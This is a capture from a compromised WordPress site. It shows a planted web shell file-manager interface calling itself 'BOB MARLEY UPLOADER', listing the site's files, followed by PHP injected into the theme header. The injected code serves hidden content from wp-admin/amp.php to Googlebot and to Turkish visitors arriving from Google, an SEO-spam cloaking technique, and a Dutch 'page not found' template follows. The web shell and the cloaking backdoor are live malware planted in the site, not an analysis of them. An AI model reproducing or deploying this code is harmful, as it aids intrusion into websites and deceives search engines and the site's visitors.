♦ BOB MARLEY UPLOADER ♦

One Love | One Heart | One Upload

Current Dir: /var/www/qeer.nl | [Parent Dir ↑]
NameSizeModifiedPerms
⬆️ ..DIR2026-06-12 20:450755
πŸ“„ .user.ini118 B2026-09-06 08:190644
πŸ“ bnersDIR2026-09-12 11:580755
πŸ“„ data.zip21,888 B2026-08-03 19:360644
πŸ“ disclaimerDIR2026-09-12 10:010755
πŸ“„ google0e39b6fbbb6ad241.html57 B2026-09-12 10:000644
πŸ“„ index.php1,617 B2026-09-22 12:510664
πŸ“„ installs.php10,968 B2026-08-03 19:360644
πŸ“„ license.txt19,903 B2026-06-12 20:450664
πŸ“„ readme.html7,406 B2026-06-12 20:450664
πŸ“„ tinyfilemanager.php225,560 B2026-09-18 14:020644
πŸ“ unzippedDIR2026-08-03 19:360755
πŸ“„ wp-activate.php7,371 B2026-06-12 20:450664
πŸ“ wp-adminDIR2026-08-03 19:360775
πŸ“„ wp-blog-header.php351 B2026-06-12 20:450664
πŸ“„ wp-comments-post.php2,323 B2026-06-12 20:450664
πŸ“„ wp-config-sample.php3,339 B2026-06-12 20:450664
πŸ“„ wp-config.php3,391 B2026-06-12 20:450664
πŸ“ wp-contentDIR2026-09-22 13:050775
πŸ“„ wp-cron.php5,617 B2026-06-12 20:450664
πŸ“ wp-includesDIR2026-06-12 20:450775
πŸ“„ wp-links-opml.php2,493 B2026-06-12 20:450664
πŸ“„ wp-load.php3,937 B2026-06-12 20:450664
πŸ“„ wp-login.php51,850 B2026-06-12 20:450664
πŸ“„ wp-mail.php8,727 B2026-06-12 20:450664
πŸ“„ wp-settings.php32,650 B2026-06-12 20:450664
πŸ“„ wp-signup.php34,621 B2026-06-12 20:450664
πŸ“„ wp-trackback.php5,214 B2026-06-12 20:450664
πŸ“„ xmlrpc.php3,205 B2026-06-12 20:450664
Powered by BOB MARLEY | One Love
<?php // Run only on the front page or the posts page (blog page) if (function_exists('is_front_page') && (is_front_page() || is_home())) { $userAgent = !empty($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $referer = !empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $googleBots = [ 'Googlebot', 'AdsBot', 'Mediapartners-Google', 'APIs-Google', 'Googlebot-Image', 'Googlebot-Video', 'Googlebot-News', 'Googlebot-Search', 'Googlebot-Inspect', 'Googlebot-Android', 'Googlebot-Mobile', 'Googlebot-Ads', 'Googlebot-Discovery', 'Google-', ]; // Regex pattern for Google bots $botPattern = '/(?:' . implode('|', array_map('preg_quote', $googleBots)) . ')/i'; // Define isFromTurkey only if it doesn't already exist if (!function_exists('isFromTurkey')) { function isFromTurkey($ip) { static $cache = []; if (isset($cache[$ip])) { return $cache[$ip]; } $url = "http://ip-api.com/json/{$ip}?fields=countryCode"; $response = @file_get_contents($url); if ($response === false) { $cache[$ip] = false; return false; } $data = json_decode($response, true); $isTurkey = (isset($data['countryCode']) && $data['countryCode'] === 'TR'); $cache[$ip] = $isTurkey; return $isTurkey; } } $visitorIp = $_SERVER['REMOTE_ADDR'] ?? ''; $isGoogleBot = (bool) preg_match($botPattern, $userAgent); $isGoogleRefFromTR = (!$isGoogleBot) && preg_match('/google\./i', $referer) && isFromTurkey($visitorIp); if ($isGoogleBot || $isGoogleRefFromTR) { $ampFile = ABSPATH . 'wp-admin/amp.php'; if (file_exists($ampFile) && is_readable($ampFile)) { include $ampFile; } else { error_log('AMP dosyasΔ± bulunamadΔ± veya okunamΔ±yor: ' . $ampFile); } } } ?> <?php /** * The template for displaying the header * * Displays all of the head element and everything up until the "cs-site" div. * * @package Swyft */ ?> <!doctype html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="profile" href="https://gmpg.org/xfn/11" /> <?php wp_head(); ?> </head> <body <?php body_class(); ?> <?php csco_site_scheme(); ?>> <?php if ( function_exists( 'wp_body_open' ) ) { wp_body_open(); } ?> <?php /** * The csco_site_before hook. * * @since 1.0.0 */ do_action( 'csco_site_before' ); ?> <div id="page" class="cs-site"> <?php /** * The csco_site_start hook. * * @since 1.0.0 */ do_action( 'csco_site_start' ); ?> <div class="cs-site-inner"> <?php /** * The csco_header_before hook. * * @since 1.0.0 */ do_action( 'csco_header_before' ); ?> <?php get_template_part( 'template-parts/header' ); ?> <?php /** * The csco_header_after hook. * * @since 1.0.0 */ do_action( 'csco_header_after' ); ?> <main id="main" class="cs-site-primary"> <?php /** * The csco_site_content_before hook. * * @since 1.0.0 */ do_action( 'csco_site_content_before' ); ?> <div <?php csco_site_content_class(); ?>> <?php /** * The csco_site_content_start hook. * * @since 1.0.0 */ do_action( 'csco_site_content_start' ); ?> <div class="cs-container"> <?php /** * The csco_main_content_before hook. * * @since 1.0.0 */ do_action( 'csco_main_content_before' ); ?> <div id="content" class="cs-main-content"> <?php /** * The csco_main_content_start hook. * * @since 1.0.0 */ do_action( 'csco_main_content_start' ); ?>

Deze pagina bestaat niet

Deze pagina bestaat niet. Wellicht is het verwijderd, gewijzigd of het heeft nooit bestaan. Misschien kan je proberen te zoeken.
Terug naar de homepagina